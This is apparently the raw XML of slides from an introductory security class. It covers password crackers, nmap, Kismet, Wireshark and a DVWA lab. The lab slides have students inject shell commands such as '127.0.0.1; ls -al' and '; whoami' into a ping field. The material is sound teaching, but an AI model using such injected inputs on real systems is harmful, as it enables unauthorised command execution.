              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Supports 5 modes of attack for over 200 hashing algorithms</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Multi-threaded</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Multi-hash and multi-OS based (Linux, Windows and OSX)</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Multi-Algorithm (MD4, MD5, SHA1, DCC, NTLM, MySQL, etc.)</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Resume or limit sessions automatically</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800"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351757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2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" u="sng" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hands-On</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cracking  Passwords with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hashcat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6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51682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Password Cracking – John the Ripper</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4401205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What is John the Ripper?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b="1"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Popular open source password cracking tool that combines several different cracking programs</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Runs in both brute force and dictionary attack modes.</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Often used in the enterprise to detect weak passwords that could put network security at risk</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Can run a wide variety of password-cracking techniques against the various user accounts on each operating system and can be scripted to run locally or remotely</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2945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3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Privacy vs. Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Privacy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>free from observation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>free from threats or danger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>assurance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="131672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2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" u="sng" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hands-On</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cracking  Passwords with John the Ripper</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35575568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Network Scanning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27260669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Network Scanning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="3108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network Mapper (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b="1"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800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Free, open-source tool for vulnerability scanning and network discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Used to discover what devices are running on networks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discovers available hosts, services, and open ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Can be used to discover security risks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47796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3693319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" u="sng" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hands-On</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network Scanning with Nmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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(Use Kali w/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6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88486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Network Scanning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4893647"/>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Kismet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial"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 wireless network and device detector, sniffer, wardriving tool, and WIDS (wireless intrusion detection) framework</a:t>
            </a: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Works with Wi-Fi interfaces, Bluetooth interfaces, some SDR (software defined radio) hardware, and other specialized capture hardware.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Wardriving: searching for wireless networks while in a moving vehicle.</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Ever wonder how your GPS/location still works without a cellular signal?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"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277553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Packet Sniffing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7828978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Packet Sniffing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4708981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wireshark</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial"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 network packet analyzer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2"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Captures network packets and tries to display that packet data as detailed as possible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2"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Measuring device for examining what’s happening inside a network cable, just like an electrician uses a voltmeter for examining what’s happening inside an electric cable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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Network administrators use it to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>troubleshoot network problems</a:t>
            </a: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Network security engineers use it to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>examine security problems</a:t>
            </a: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QA engineers use it to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>verify network applications</a:t>
            </a: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Developers use it to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>debug protocol implementations</a:t>
            </a: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People use it to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>learn network protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> internals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178239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938992"/>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Web Vulnerabilities &amp; Exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17396133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Command Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="11415642" cy="341632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Open browser, go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://dvwa.example.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="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username: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>password</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Click “DVWA Security” on the left.</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Set to “low” security in the dropdown then “Submit”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:b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Click “Command Injection” on the left.</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Enter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> for the IP Address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334230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Command Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="11415642" cy="5262979"/>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Entering “127.0.0.1” runs the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> command on the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ping 127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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On Linux, we can execute more than one command on a line by using the ; to separate commands</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:b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Try entering “127.0.0.1; ls -al”</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Can you see the contents of the folder?</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You can “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>shortcircuit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” the ping command by not entering an IP, just enter a semicolon followed by whatever you want to run!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>To find out what user is operating:   “; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"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8610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646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Malware – “malicious software”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16922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Command Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="11415642" cy="4154984"/>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How can we determine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
